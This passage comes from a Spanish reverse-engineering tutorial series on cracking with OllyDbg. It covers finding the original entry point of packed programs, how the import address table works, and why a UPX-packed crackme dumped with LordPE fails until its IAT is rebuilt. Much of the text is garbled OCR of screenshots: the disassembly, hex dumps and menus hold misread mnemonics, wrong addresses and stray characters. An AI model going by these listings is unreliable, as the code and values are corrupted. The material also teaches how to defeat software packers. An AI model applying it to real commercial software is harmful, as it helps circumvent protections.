3 MOU DWORD_PTR SS: [EBP-18],ESP 
COA466 kernel32.GetVersion 
X0R EDX, EDX 
MOU DL, AH 
) 34E£64501 MOU DWORD _PTR DS: [456634], EDX 
E Mat FOXY FOYw 


255 ES 
S DÍ 


Alli veo el OEP que lo obtuve con el metodo de la primera api utilizada por el programa, si el 
programa detecta el BP en GetVersion, se puede poner tambien en el RET de la api. 


Creo que metodos hay como packers hay y son miles, estos son los ejemplos de los mas usados, ya 
veran cuando desempaquemos como estos metodos se pueden flexibilizar y adaptar al caso, pero es 
bueno que tengan una idea de los metodos generales, para poder tener una buena base de los 
mismos. 


Adjunto un crackme para practicar que hallen el OEP el UnPackMe_tElock0.98.exe que tiene 
algunos trucos y que no le van todos los metodos anteriores, auqnue es bueno que practiquen y 
hallen el OEP por ustedes mismos. 


Recuerden que si un desempacador detecta un BP o HBP, y no corre, deben revisar bien que no 
haya ningun BP mi HBP puesto, para que vuelva a correr, recuerden que el metodo del PUSHAD 
deja un HBP puesto que si no funciona el metodo, hay que borrar antes de intentar otro. 


Por supuesto el proximo nivel sera un rar con clave, la clave para abrir el mismo sera el OEP del 
telock0.98 jeje, a practicar y a probar que tienen que ser expertos en hallar OEPs antes de pasar al 
dumpeo y reparacion de IATSs. 


Hasta la parte 33 
Ricardo Narvaja 
20 de febrero de 2006 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 33 


Que es la TAT y como repararla 
Antes de ponernos a reparar IATs como loco haremos una introduccion de que es exactamente la 


IAT y veremos en el CRACKME DE CRUEHEAD original donde esta ubicada y que le hace el 
packer a la misma, comparandolo con el crackmeUPX empacado. 


Primero demos una idea generica de para que sirve todo esto que vamos a explicar: 


El tema es el siguiente, como vimos las apis tienen una direccion en nustra maquina, por ejemplo si 
abro el Crackme de Cruehead original en OLLYDBG y tipeo 


204021580/66 00 60 66 09 BO 66 06 BO 66 66 Ba BB 66 BA BB|.. 


no ? MessageBoxA v| HEX: 77D504EA - 


Veo que en mi maquina la direccion donde se encuentra la api es 77D504EA, si ustedes ven la 
direccion de esta api en vuestras maquinas, algunos tendran la misma direccion, otros no, depende 
de la version de Windows que tengan, y de las actualizaciones que hayan bajado tambien, que como 
saben son muchisimas, y en cada una al bajar nuevas versiones de la dll que contiene la api en este 
caso User32.dl, generalmente cambiara la direción. 


TestDbg - CRACKME. EXE - [CPU - main thread, module USER32] 


[e] File View Debug Plugins Options Window Help 
ax] ej] visi $0) ul +: LjEjmjT] 
mol 


YrO05b4EC 


PUSH_EBP 

3BEC MOU EBP,ESP 

O RIEL CMP_ DWORD PTR DS: [77D07046C],0 
770504F3| 64:A1 18000000|MOU EAX, DWORD PTR FS: [18] 
77D0504FE| 6A_00 PUSH O 


50500 FFTO 24 PUSH DWORD PTR DS: [EAX+24] 


Cada vez que Microsoft saca una nueva version de esta dll, casi siempre cambiara la direccion de 
las apis que contiene, por lo tanto si yo programara el Crackme de Cruehead, al saltar a la api 
MessageBoxA, lo haria saltar a 77D504EA, y funcionaria pefcetamente en mi maquina, y en las 
que tuvieran la suerte de tener la misma version de User32.dll que yo, en el resto de los demas 
Windows que o bien no sean XP, o bien no tengan la misma version de la User32.dll, saltaria a una 
direccion donde no estaria la api, lo cual produciria error y no correría. 


El tema entonces es que el sistema operativo debe suministrar alguna forma de compatibilizar para 
que mi crackme funcione en otros Windows (dentro de ciertos limites) y en otras versiones de la dll 
debe funcionar perfectamente. 


Para ello se crearon estas famosas tablas llamadas IT (Import Table), y IAT (Import Adress Table) 


No se austen son puro nombre una vez que uno sabe donde esta ubicada cada una en un programa 
desempacado y para que sirven no hay mas miedo. 


Follow Im DUMP » 
View call tree Ctrl4K 


o 


Search For » Name (label) in current mos 
5 E Find references to » Name in all modules 
a View » E d 
Ba 0 omman 
sÓ 68 Copytoexecutable » 
00 04 h Sequence of commands 
sa 62 Analysis » 
06 6 O Comstamt 
BB Br " : 
an Sa Appearance » Binary string 
0 06 


o 
IB 


yl 


¿DN 


ES 


All commands 


All intermodular calls 


¿o Allsenuiences 


Ahora hagamos SEARCH FOR-ALL INTERMODULAR CALLS y veamos los CALLS que van a 
otros modulos o dlls, que pueden ser calls a apis. 


Hagdress |ULsSassemply 
60491000| PUSH 


pa4B1002 
p04B1013 
pu4B1052 
00461063 
00401090 
gu4010C3 
00491005 
004B10E0 
DO4B1DEC 
BO4B1OFC 
pa4B110C 
ou4b1116 
ou401123 
pu4B11sC 
00461195 
0041202 
po4B121E 
pu4u1292 
0a40129A 
gu401204 
00401254 
B04B12FB 
B04B133A 
0461350 
00461364 
041378 
004013BC 


CALL <JMP. 8: KERNEL32. GetModu leHandleA> 
CALL <JMP. £USER32.FindtlindowA> 

CALL <JMP. USER32.LoadIconA> 

CALL <JMP. 2 USER32.LoadCursorA> 

CALL <JUMP. USER32.RegisterClassA> 
CALL <UMP. USER32. CreatellindowExA> 
CALL <JMP. USER32. Show indow> 

CALL <UMP. USER32. Updat ell indow> 
CALL <JUMP.SUSER32. Inval idateRect > 
CALL <JMP. SUSER32. GetMessageA> 

CALL <JMP. ¿USER32. Trans lateMessage> 
CALL <JMP. ¿USER32.DispatchMessageA> 
CALL <UMP. $ KERNEL32. Ex itProcess> 
CALL <JMP. USER32. Def indowProcA> 
CALL <JMP. 2 USER32.PostGu itMessage> 
CALL <JMP. 2 USER32.DialogBoxParamA> 
CALL <JMP. ¿USER32.DialogBoxParamA> 
CALL <JUMP.£USER32. Inval idateRect > 
CALL <JMP. USER32. SetFocus> 

CALL <UMP.£USER32. GetDlgltemTextA> 
CALL <UMP.SUSER32. GetDlgltemTextA> 
CALL <JUMP. 8 USER32.EndDialog> 

CALL <JMP. 8 USER32.EndDialog> 

CALL <JMP. USER32. MessageBoxA> 

CALL <JMP. USER32. MessageBeep > 

CALL <JMP. 2 USER32. MessageBoxA> 

CALL <UMP. 8 USER32. MessageBoxA> 


est inat Lon 
ers itial CPU selection) 
p . GetModu leHandler 
FindtlindowA 
LoadIconA 
LoadCursorA 
RegisterClassA 
CreatellindowExA 
Showblindow 
Updat ell indow 
Inval idateRect 
GetMessageA 
Trans lateMessage 
DispatchMessageA 
.ExitProcess 
eflWindowProcA 
PostQu itMessage 
DialogBoxParamA 
DialogBoxParamA 
Inval idateRect 
SetFocus 
GetDlgltemTextA 
GetDlgltemTextA 
EndDialog 
EndDialog Ae 
MessageBoxA 
MessageBeep 
MessageBoxA 


MessageBoxA AS 


Alli vemos varios Calls a la api MessageBoxA como ejemplo, si hacemos doble click en el primero 


de ellos 


6A 30 


63 
FF7S 08 


JA pod fdo fol flo oda pr po 


68 22214000 


6A ua 

Es ADOO0BBn 
6A 30 

6s 60214000 
FF7S US 

Es BD0000B0 
Cc3 

2B7424 04 
56 


ES VUBLULLLO | MUU EHX,Y 
EB DS 


PUSH 30 

PUSH CRACKME. 604982129 
PUSH CRACKME. 60402134 
PUSH DWORD PTR SS: [EBP+8S] 


ES D90000Ba 
C3 


PUSH B 


PUSH 38 

PUSH CRACKME. 004021608 
PUSH CRACKME. 00482169 
PUSH DWORD PTR SS: [EBP+8] 


MOU ESTI, DWORD PTR SS: [ESP+4] 
PUSH ESI 

MOV AL,BYTE PTR DS: [ESI] 
TEST AL,AL 


143%=< MP. LUSERSZ. MessageborA> 


Style = E A 
Title = "Good work t” 
Tejt = "Great work, matet/Now tr 
hOwnex 
MessageBoxA 

Crescaorbezo = MB_OK 
MessageBee| 
Style = MB Pok: MB_ ICONEXCLAMAT IOP 
Title = "No luck? 
Text = "No luck there, matet” 
hOwnex 
MessageBoxA 


Vemos que en realidad es un CALL 40143A que OLLYDBG para aclararnos nos pone que saltara a 
la api MessageBoxA, cambiando la notacion por CALL <MessageBoxA> pero no es un call 
indirecto, es un call directo 


CALL 40143A 


E= Debuegging options 


Security Debug | Events | Exceptions | Trace | SFX Strings | Addresses | 
Commands — Disasm | cpu | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 


Disassembling syntax: 
(e MASM (Microsoft) 
C IDEAL (Borland) 
C HLA [Randall Hyde] 


|” Disassemble in lowercase 

Tab between mnemonics and arguments 
Extra space between arguments 

[Y Show default segments 


ÍV. Always show size of memory operands 
Show NEAR jump modifiers 


[Y Show local module name 


Show symbolic addresses 


Undo | Cancel | 


Vemos que en las opciones del OLLYDBG en la pestaña DISASM si le quitamos la tilde a SHOW 
SIMBOLIC ADDRESSES el listado queda mas claro. 


ala da] ? DH Yu run y NESUILT = Y 

0040 FF75 88 PUSH DWORD PTR SS: [EBP+8] [nina 

0040 ES 72010000 EndDialog 

an49 ES 01000000 

0040 CRACKME. 00401325 


DD 


B DF 
jalsJ5J515151515) 

B D3 CRACKNME. 144401325 

Style = MB_OKIMB_ ICONEXCLAMAT 11 

Title = "Good workt 

Teut = "Great work, matet¿Now 


y 


PLBLBARAAAS Ahhh 
A 


[5] FF75 08 PUSH DWORD PTR SS: CEBP+8] hOwner 
Ba4a a D9600B0a MessageBoxA 
pHu4b 
an4a s5A 6n ¡eri = MB_OK 
0045 ES ADOBBB6n Hessagebeeo 
151] 5A 30 PUSH 30 Style MB_OK; dr ICONEXCLAMAT 11 
0040 63 60214000 |PUSH 402160 Title = "No lu 
p04a 8 PUSH 402169 Text = "No Era A matet” 


FF75 68 PUSH DWORD PTR SS: CEBP+8] hOwner 
ES BDO0000n MessageBoxA 


c3 

28B7424 04 MOU ESI,DWORD PTR SS: [ESP+4] 
56 PUSH ESI 

2A06 MOU AL,BYTE PTR DS: [ESIJ 
2400 TEST AL,AL 


B040143A=<JMP. ¿¿USER32. MessageBoxA> 


DD 
Pr pode o Ja o pd pd pd 


Vemos que igual nos aclara a la derecha los parametros y la api a la cual ira, pero ahora nos muestra 
el CALL realmente como call directo. 


CALL 40143A 


En SEARCH FOR INTERMODULARS CALLS 


CIA A AA A 


1 (Initial U selection) 
60401002 | CALL BO401506 ', GetModu leHandleA 
0401013 CALL 004014BE «FindlindowA 
60401052 | CALL B4M4B1423 «LoadIconA 
604901063 | CALL 604014904 «LoadCursorA 
00401099 | CALL 64401433 .RegisterClassA 
B04B10C3| CALL 60401494 . Create indowExA 
0045610D5| CALL 6040146A «Show indow 
DO4B10E6| CALL 6041432 . Updatell indow 
BOB4B10EC| CALL 1M440144C . Inval idateRect 
BO4B10FC| CALL 040461406 .GetMessageA 
6040110C| CALL 0M46145E 


«Trans lateMessage 
6B0401116/ CALL BB64014A6 DispatchMessageA 


B0401123/| CALL BB4B1512 '.ExitProcess 
B040118C| CALL B640149A .DeflWindowProcA 
B0401195/| CALL 60401440 .PostQu ¡tMessage 
B0401202| CALL M04014AD0 .DialogBoxParamA 
B040121E| CALL B04014A0 .DialogBoxParamA 
60401292 | CALL B640144C . Inval idateRect 
B040129A/| CALL BB6401434 . SetFocus 
B0401204| CALL 66401400 .«GetDlgltemTextA 
B04012E4| CALL 66401400 .«GetDlgltemTextA 
B04012FB|CALL B04014B2 .EndDialog 
£0456133A| CALL 64451462 USER32.EndDialog 
£646135C| CALL M4646143A USERS2. MessageBoxA 
60401364| CALL 60401416 USERS2, MessageBeep 
60401378| CALL B046143A USERS2, MessageBoxA 
4B4013BC| CALL B044143A USERS2, MessageBoxA 


w 


Vemos que en realidad los tres calls a MessageBoxA son calls a 40143A, pues veamos que hay alli. 


A 


USER32.LoadIconA 
USER32.LoadBitmapA 
USER32.SetFocus 

USER32. MessageBoxA 
USER32.PostQu itMessage 
USER32. llinHe lpA 
USER32. Inval idateRect 
USER32. Trans lateAcce leratorA 
USER32. Movel indow 
USER32. Trans lateMessage 
USER32.LoadMenuA 
USER32. Show indow 
USER32. SendMessageA 
USER32.SetTimer 
USER32.SetlindowPos 
USER32. Update indow 
USER32.RegisterClassA 
USER32.BeginPaint 
USER32. Create indowExA 


le 


BE E CEC ACE ACE E AS A E O O O O O O CE A ACE ACE ACE 
EE O CE ACE ACE ACE ACE CE E E E E E A AC CO A AC ICE ACE 


DS: COB403IACI=PPDS04EA (USERSZ. MessageBorA) 
5% calls from 6040135C, BB4B1378, BB4B13BC 


Aquí vemos el quid de la cuestion, para llegar a la api hace un JMP indirecto, que al tenerlo en esta 
forma de visualizacion se ve claro que toma el valor a donde saltara de 4031AC 


JMP [4031AC] 


IMUL EDI ,EAX a TO 
ADD EDI,EBX - 
31 Security | Debug | Even 


EB ED JMP_SHORT_CRACKME. 004013E2 . 
S1F7 34120001 XOR EDI, 1234 Disasm | 
SBDF MOU EBx, EDI Commands CPL 


BFAFFS | 


Disassembling syntax: 
(* MASM (Micro: 
C IDEAL (Borlar 
( HLA [Randall 


DOS 


CCE CE CE E E E CE CO IC ICE 
CI IC ACE CE ICO AC CO IC AC 


E AE KE ACE ACE AC IC AC AC IC IC CO CD CD AC 
aaa 


T Disassemble in lowe 


TT Tab between mnern 


DD 


T” Extra space betweel 


[Y Show default segme 


DA 


ÍV. Always show size of 
Show NEAR ¡jump m 


FHODAMONO Dam 


Do 
O 


y 


a E 5S 
0 34| j- Fr2s ES [Y Show local module r 
DS: [OB4031ACI=770504EA (USERSZ.MessageBoxA) [4 Show symbolic add 
Local calls from 06401350, 00401378, BO4BISBC 
ASCII y 

360 -£9 21 40 “t6.hiftB. 


da [As 2 ONifal Qs. E = ME 22 Lietaliñas Lo ll Pra 


Tambien vemos que si ponemos la tilde, se nos complica un poco entender que es un salto indirecto, 
por lo cual la quitaremos mientras estamos trabajando con IA Ts. 


Y aquí esta el truco, el programa salta a la api con un JMP indirecto que toma la direccion que la api 
tiene en nuestra maquina de 4031AC, y vemos que para todas las otras apis, hay otros JMPS 
INDIRECTOS similares. 


Ahora empezamos a ver un poco mas claro el tema de la compatibilidad entre maquina, cuando el 
programa tiene que ir a una api, hace un salto indirecto, leyendo la direccion de la api de una 
especie de deposito, si vemos en el dump este deposito. 


Ur 


1D 
nor 
4 . 
OSOS 


Roo aaa 


ase MÍ A e 
I 


E 


ro. 


Inval idateRect 
TranslateMoceleratorA 
j 


inde POS 
atelWindo 17) 
rn 


Eon 


coaaaaaaaaamamamamta mn mm mr 
í 


cat E Wi in do Di 


==] =] =] e] 
> 


“iD 


> 


o 
( 


ue 'wétEw 
5 "EwWEA40w 
£: Euylidw 
+(0wa3-Ew 
AIDWIREw 
. 10wt E 
-T0WINEW 

¿AIW*DEW 

"EDWLREW 
DidWEREWw 
PbEwHA8w 
iidEwA30w 
- HEWddá ii 
Br. ... 
pe i0ke! 


Alli vemos realemente que 4031AC es una parte de un deposito que contiene todas las direcciones a 
las apis en mi maquina, ahora este DEPOSITO es la famosa IAT o IMPORT TABLE ADDRESS, 
aquí esta la clave de la compatibilidad, quiere decir que todos los programas tendran los mismos 
JMPS INDIRECTOS a las apis, lo que cambiara es el valor guardado en el deposito, para cada 
maquina tendra direcciones diferentes que llevaran el salto indirecto, a la direccion correcta de la 


apl. 


Pero un momento me diran algunos, 4031AC es una direccion del programa, por lo cual si tiene 
diferentes direcciones para cada maquina, pues entonces el programa seria diferente para cada 
maquina? 


Jeje buena pregunta ahora veremos como funciona el sistema, pero ya sabemos el objetivo, el cual 
es llenar la IAT de las direcciones correctas para cada maquina. 


PU TElLETEIILES CuiITA 


2xxecutable file 
Copy to executable file 
Go to 


Mir. 


Air 


Hex 

Text 

Short 

Long 

Float 
Disassemble 
Special 


r. 


Urdgra . . 4A >. dre A 
AAA A AURORA] 


. rd 


Appearance 
FS BS Di 77 


9A F3 D2 77/AT1O0witEw 


Sabemos que si hacemos VIEW- EJECUTABLE FILE podemos ver lo que hay en la direccion 


4031AC, realmente en el archivo ejecutable guardado en nuestro disco rigido. 


Ar dr 


File C:WDocume , E Ja)fx] 


A 


Lér Air Af Ar 


ro. 


lr. 


sat B 
D? Di 77 se 
B6 Di 77 SE 
IC 


Vemos que el valor en el exe, es 60 33, y que nosotros parados en el entry point ya tenemos en la 
memoria en la misma posicion la direccion de la api EA 04 DS 77 guardada alli, quiere decir que el 
sistema al arrancar el programa, tomo el 3360 que habia alli en el OFFSET OFAC que corresponde 
a la direccion 4031ac y lo machaco con el valor de la direccion real de la api en mi maquina. 


Magia? 


No no asi trabaja Windows, cada archivo que arranca, el sistema operativo llena la IAT de las 
direcciones correctas de las apis en mi maquina, en este caso lleno 4031AC con el valor de la api 
MessageBoxA y los valores alrededor, con las direcciones de oras apis, para completar la tabla IAT 
o deposito de direcciones de las apis en mi maquina. 


Ahora el sistema no es mago como hace esto, vemos que en OFAC tiene un valor 3360, le indicara 
algo al sistema este puntero, para que sepa que api es la que debe llenar alli? 


Pues si 3360 es el valor al cual si le sumamos la imagebase queda 403360 y si miramos en el sump 
esa direccion que vemos? 


403360| 09 
z 5 


Translat 
65 41 63 63 65 6€C 65 72 | eAcce ler 
61 74 6F 72 41 00 00 M0 atorA... 
4D 6F 76 65 57 69 6E 64|Movellind 
6F 77 00 00 BB BO 54 72 /0W.... Tr 
61 6E 73 6C 61 74 65 4D ans laten 
65 73 73 61 67 65 00 00 essage.. 
BB 60 40 EF 61 64 4D 65 ..Loadhe 
3|6E 75 41 060 00 66 53 68 nuA...Sh 
owbllindow 


ÍMeC.... 


Pues aquí esta el truco es un puntero a la string MessageBoxA, eso quiere decir que el sistema mira 
ese puntero, busca que api es por el nombre y con GetProcAddress, saca la direccion de dicha api en 


nuestra maquina, y lo completa en la IAT, machacando el 3360, con la direccion real de la api en 
nuestra maquina, y de esta forma se asegura que el programa funcione para cualquier version de la 
dll, porque halla la direccion antes de llegar al Entry Point del programa y una vez que llego alli, 
queda la ¡at completita con las direcciones de las apis en mi maquina, si miro la ¡at de otra maquina 
diferente vere que el contenido de 4031AC es diferente pues la direccion de la api, es diferente, 
pero cuando haga. 


JMP [4031AC] 


ira a su MessageBoxA al igual que en mi maquina, el programador no se tiene que preocupar, 
siempre que haga calls o ¡mps indirectos al valor que se encuentra en el deposito de la IAT, este 
estara correcto, al arrancar el sistema coloco en tiempo real la direccion correcta, apuntando a 
MessageBoxA en todas las maquina para asegurar compatibilidad. 


O sea que para que el sistema me complete correctamente la direccion de la api en la ¡at, debe el 
archivo tener varios punteros como vimos. 


1)en la entrada de la ¡at en el ejecutable en mi rigido, debe tener un puntero a una cadena de texto 
que le identifique al sistema que api debe colocar en esa entrada. 
2)Por supuesto debe tener la cadena de texto con el nombre de la api 


Pues con estos dos puntos, podemos cocluir que el programa arrancara y el sistema me llenara la 
TAT con los valores correctos. (mas adelante veremos el trabajo cmpleto de este sistema) 


Ahora ya vimos como llegamos al OEP de un programa empacado, porque se dice que cuando 
llegamos alli y dumpeamos un programa debemos reconstruir la IAT, los packers la rompen? Que 
hacen con ella, pues si la rompen algunos mas otros menos, el truco es que el packer no necesita la 
lat del programa en si porque arranca desde el mismo desempacador, y puede leer las apis que 
deberian ir en la IAT, mientras va desempacando el programa, y una vez que leyo cada api, y lleno 
la iat con las direcciones correctas de cada api, pues las strings que le indicaron cual era cada api, 
las borrara, ya no las necesita, pues el programa ya arranco y tiene ya en la IAT las direcciones 
correctas. 


Es mas en los packers ni siquiera existen esas strings ya que el programa o bien las guarda 
encriptadas o bien las guarda en alguna otra direccion que no sean facil de hallar por nosotros los 
crackers. 


Veamos el ejemplo con el empacado UPX para ver la diferencia y como nos queda al dumpearlo, y 
porque hay que repararlo. 


TestDbg - CRACKME UPX.EXE - [CPU - main thread, module CRACKME_] 


[c] File View Debug Plugins Optioms Window Help 
ax] ej] vi+i $30] 1] > LjejmTjw)jn]c]+fxj8 
68 PUSHAD 


5 
bB4B9BF1| > BE 009040600 _|MOU ESI, 409000 


BBABSGBFE| . SDBE BBSBFFFI LEA EDI,DWORD PTR DS: CESI+FFFFS000] 
BO4B9EFC| . 5? PUSH EDI 
104095 - [83C0D._FF OR_EBP,FFFFFFFF 
an4a .v EB 10 JMP SHORT B0489C12 CRACKME_. 664 
a0n4 90 NOP 
90 NOP 
90 NOP 
90 NOP 
90 NOP 
90 NOP 


Aquí tenemos el Crackme de Cruehead que esta empacado con UPX que habiamos hecho en partes 


anteriores. 


Miremos la direccion 4031AC donde estaba el deposito de apis en el original 


DOUE 


Dada aaa Da od 
La 


O 


DO 


DI 


aaa ada 


d 


Command | 


nada borro todo, y las strings de las apis estaban en 403360 que haya alli? 


Dí 


a 
po] 
po] 
pot] 
y] 
pot] 
py 
po] 
Lo 
po] 
o 
pot] 
Ly 
po] 
y 


00 00 00 00 00 00 00 BA .2..oo.. 


DADA 
paño] 
palio] 
pai] 
050 
paa] 
00 
pai] 
pi 
pai] 
050 
pora] 
00 
paño] 
palio] 
pai] 
050 


Bo 60 09 Ba 66 00 Ba pre ........ 


Nada, de nada, lleguemos al oep y veamos que hay en estas mismas direcciones, ya que para que el 
programa corra en la ¡at debe haber algo si no al saltar a la api, y hacer 


JMP [403 1ac] 


y estar vacio dara error, o sea que el packer hara el trabajo que hace normalmente el sistema y 
llenara la iat, lleguemos al OEP. 


Baca OR EAX, EAX 
MOU DWORD PTR DS: [EBX],ERAX 


B 
PROS. DE ces A 
FF96 6095090 
61 P 
ch? sose1000 
D 


CRACKME_. 606409038 


7 BC?2FFFF CRACKME_. 00481090 


Ponemos un BP en el salto al OEP y damos RUN y llegamos alli 


Veamos que hay en el lugar de la ¡at 


tE 


JA o fo fol Jl Jl fdo Jl Jl Jr Jr o o o o Jl flo flo fl fl fr JJ 


Maa o o o Ms Bo a Ds Ba a Ds a a Do Do os Do Da 1 1] 


OOOO amm mtam 


.EndPaint- 


1> 


AidWiEw 
- 10wt Di 
£| “IBuilEw 


Vemos que para que el programa funcione el desempacador lleno la ¡at con las direcciones correctas 
de la api en mi maquina, pero si nosotros dumpeamos aquí habra un problema, el ejecutable que 
salga del dumpeado le faltan datos para arrancar. 


Ya de por si las strings que identificaban cada api y estaban en 403360 no estan 


Veamos hagamos un dumpeado a ver que queda, pero ya nos damos cuenta que tendremos el 


codigo del programa correcto, pero el dumpeado no correra al no poder el sistema llenar la ¡at por 
falta de datos. 


Por ahora utilizaremos un programa externo al OLLYDBG para dumpear este es el LORDPE 
DELUXE que se puede bajar desde mi HTTP. 


http://www.ricnar456.dyndns.ore/HERRAMIENTAS/L-M-N-O-P/lordpe-delux1.4.zi 


[ LordPE Deluxe ] by yoda 


PID ImageBase | ImageSize PE Editor 
9% [system] 00000000 00000000 00000000 EEE 
9% [system] 00000004 — 00000000 00000000 — 
e teostemootagiien 22 meten 00000150 48580000 O0DOFOOO Rebuild PE 


a Ac kwindowssystem32cstss.exe 00000274 44580000 00005000 = 


ImageBase | ImageSize 


_ PEEdta | 

_ Break 4 Eres | 

_ Rebuild _| 

| UmseR_ | 

a 121 | || Dumpersinve!] 
| _ Options | 

tio | 

ME 


Alli tenemos al LORD PE DELUXE busquemos el proceso a dumpear que es el crackmeUPX que 
tenemos detenido en el OEP. 


(DAX) 


PE Editor | 


Path 


WD csarchivos de pr atoperatopera.exe Break $ Enter 
ah HE epic: 4.exe UEG 
ls 'D c: uments and settingsvricardov escritorio, 32- introduccion al cracking con ollydbg parte 324.c _ Rebuld PE_| 
pls EN c:idocuments and settings+ricardotescritorioWordpe-delux1.4Mordpe.exe 7 Unsplit 

As y 
bs 4 | IS ] [»] Dumper Server | 


pe Path ImageBase | ImageSize | Options | 


Alli esta el crackmeUPX, marquemoslo 


[ LordPE Deluxe ] by yoda 


Path 


a c4archivos de programatoperahopera.exe 
A c:todbg110 finaliparcheado 4.exe 


e: dump full... 
MY) extdocuments and se Jump partial... 


EY [AN | dumpregion... 


Path | active dump engine » 


4 4 ja 
'D| c:idocuments and se priority ñ Select! 
[3 cwindowssystem3 OOO 00D About... 
(8%) c:windowsisystem3 correct ImageSize 00101000 
[Sl c:windowstsystemBl 1. a 2 00097000 


Haciendo click derecho cambiemos a INTELLIDUMP que dicen que es mejor dumpeando, jeje y 
luego hagamos click en DUMP FULL. 


LordPE 


”! ) Dumping done. 


Lo hemos guardado con el nombre DUMPED.exe 


dumped.exe - Error de la aplicación ES 


(Xx) La aplicación no se ha podido inicializar correctamente (Oxc0000005), Haga clic en Aceptar para terminar la aplicación. 


Si corremos el dumpeado vemos que no arranca tratemos de abrirlo en OLLYDBG 


Y nos da el mismo error pero si vemos el LOG del OLLYDBG los errores 


A A UT LN A A 


Process terminated 


File "C:inDocuments and Settings Ricardo“Escritoriow32- 
New process with ID 00B0BBCIC create 
SEF6 Main thread with 10 O0BBBF2C created 
2513) Access Violation when reading [7CCóa1D0771 
4ED1/Access violation 
:374ED1| Access violation 
Debugged program was unable to process exception 


A 


El error se produjo en 7c929913 en mi maquina vayamos a esta direccion, ustedes en su maquina a 
la direccion que figure en el LOG. 


AAA PEE AAA A AO A AA AA A PA y] 
El ADD Elx, ERX 

MOU EAX, DWORD PTR DS: [ESI+207 
ADD EAX, DWORD PTR SS: [EBP+8] 


LEA_EBXx,DWORD_PTR DS: [ECX+2] 
movz +, WORD_PTR_ DS: LECX 
CHP . PTR_DS: [ESI+18] 


EC 
MOV DWORD PTR 
MOU DWORD _PTR 


MOU ECX, DWORD 
ADD ECX, DWORD 
MOU DWORD PTR 
MOV EDX, DWORD 


SS: [EBP+C],EBX 
SS: [EBP-4],ECX 


PTR DS: [ERX+EC%*4] 


PTR_ SS: [EBP+8] 
SS: [EBP+18],EBX 
PTR_SS: [EBP+18] 


MOU BL,BYTE PTR DS: [EDXJ 
MOV DL,BL 


Le pondre un HARDWARE BREAKPINT ON EXECUTION y un BP a ver si para antes de dar el 
error. 


Pues veo que no para, pero tengo otra forma de parar en un error y es quitarle la tilde a las 
excepciones, al reiniciar 


[c] File View Debug Plugins Options Window Help 


mx] ej] vie] +0) ul += Ljejmtiwju[c)+[k]8 


B3C8S ADD ECX, EAX 

3846 20 MOU EAX, DWORD PTR DS: [ESI+207 
B345 us ADD EAX, DWORD PTR SS: [EBP+8] 
8059 02 LEA _EBX,DWORD_PTR DS: [ECxX+2] 
BFB709 MOUZX ECX, WORD _PTR DS: LECX] 
3B4E 18 CMP ECX, DWORD PTR DS: [ESI+18] 
895D ac MOU DWORD PTR SS: CEBP+C],EBX 
3894D FC MOV DWORD _PTR SS: CEBP-47,ECX 
BFS3 A0B20000 

2B0C8ss 


ECX, DWORD PTR DS: CEAX+ECx*4] 
ECX, DWORD PTR SS: [EBP+8] 

13 DWORD PTR SS: [EBP+18],EBx 
13 EDX, DWORD_PTR_SS: [EBP+18] 
BL, BYTE PTR DS: [EDXJ 


Vemos que si para antes de llegar al Entry Point en el error que no deja arrancar al dumpeado.. 


Ya que estamos miremos que hay en la ¡at 


04 wétEw 
S "Ew840Dw 
£- EujllDo 
+¡0w3-Ew 
AiDWIEw 
. TDwt E 
-«TO0WINEWV 
«AIW "DEW 
HATE = 
DidWEEw 
PbEw+A8w 
iidewA30w 
- HEwWdiá Tu 


Alli vemos que el dumpeador, logcamente guardo los valores que habia en la ¡at al momento de 
llegar al OEP que son los valores correctos en mi maquina de cada API, pero el tema como 
habiamos visto es que para que un exe arranque sin error y en cualquier maquina, en el ejecutable, 
alli debe haber un puntero a cada string con el nombre de la api, y el ejecutable contiene el mismo 
valor este que estamos viendo, que el sistema esta tratando de leer y al no hallar el puntero a la 
string de la api, le da error. 


Pues no hay que ser un genio para darse cuanta que para que arranque el programa hay que restaurar 
los nombres de las apis, y los punteros a ellas,si quisiera hacerlo a mano es un trabajo terrible 
deberia cambiar el contenido de 4031AC por un puntero a la string de MessageBoxA y con ciertos 
arreglos de algunos punteros, pues arrancaria. 


Aquí tenemos planteado el desafio, esto es lo que debemos reparar para que nuestro dumpeado 
ademas de tener el codigo correcto, que por supuesto lo tiene, corra perfectamente. 


De que tiene el codigo correcto no hay duda vayamos a 401000 y miremos que hay alli 


al + 1je/mjt/wjn/c]/k]8/R]- Js] ¿338/?] 


AS CA204000 MOU DWORD PTR DS: [4020CA],EAX 
6A Ba PUSH O 
68 F4204000 PUSH 4020F4 ASCII "No need to disasm the codet” 


ES A6040000 
DECO OR EAX, EAX 
74 Bl 


c3 

C7r65S 64204000 1MOU DWORD PTR DS: [402064], 4003 

DS: [402068], 461128 

DS: [40206C],0 

Cros 76204000 DS: [402070],0 

Ai CA204000 PTR_ DS: [4028CA] 
ias DS: [402074],EAXx 


¡NR TNDOND-J OT 


Di030000 CALL aa401428 
73204000 MOU DWORD PTR DS: [4902078],EAX 
997FeBaa PUSH 7FGB 


PUSH A 
AzozoBoa | CALL 00481404 
AS 7C204000 MOU DWORD PTR DS: E EAX 
C705 30204000 DS: [402680],5 
DS: [402084], 402110 En "MENU" 
DS: [4020887], 4020F4 ASCII "No need to disasm the codet” 
PUSH 402064 De 


PUSH 9 


a] 


Es F3030000 
59 Ba 


LOMA 


Si vamos a la zona de los saltos a las apis 


Alli vemos el call a la MessageBoxA que habiamos visto anteriormente 


rrro uo 
3 73010000 
Es 01000000 MOU EAX, 1 


DF 
Bs ES MOU EAXx, 6 


5A 30 PUSH 38 
63 29214000 PUSH 402129 ASCII "Good work t” 
63 34214000 PUSH 402134 ASCII "Great work, matet/MNow try the next CrackMet” 
FF?S 08 PUSH DWORD PTR SS: [EBP+8] 

53 melal55121519) 


CUSN UWURO TIRA 223 LEDFTOJ 


6A 6n 

Es ADOGBBaBA 

6A 30 PUSH 38 
68 66214000 PUSH 402160 ASCII "No luckt” 


68 69214000 PUSH 462169 ASCII "No luck there, matet” 
FF7S 08 PUSH DWORD PTR SS: [EBP+8] 
Es BDO60u0a 


2eR7474 hd 


MA EST NARA PTR <<* PTESP+41 A 


En el CALL el codigo esta correcto, nos lleva al mismo JUMP que antes 


MOU EBX, EDI 


man 
on 


384314000 
83314000 
280314000 
90314000 
94314000 
93314000 
90314000 
A0314000 
A4314000 
As314000 
AC314000 
E0314000 
E4314000 
B3314000 
EC314000 
Co314000 
24314000 
C3314000 
Cc314000 
Do314000 
D4314000 
D3314000 
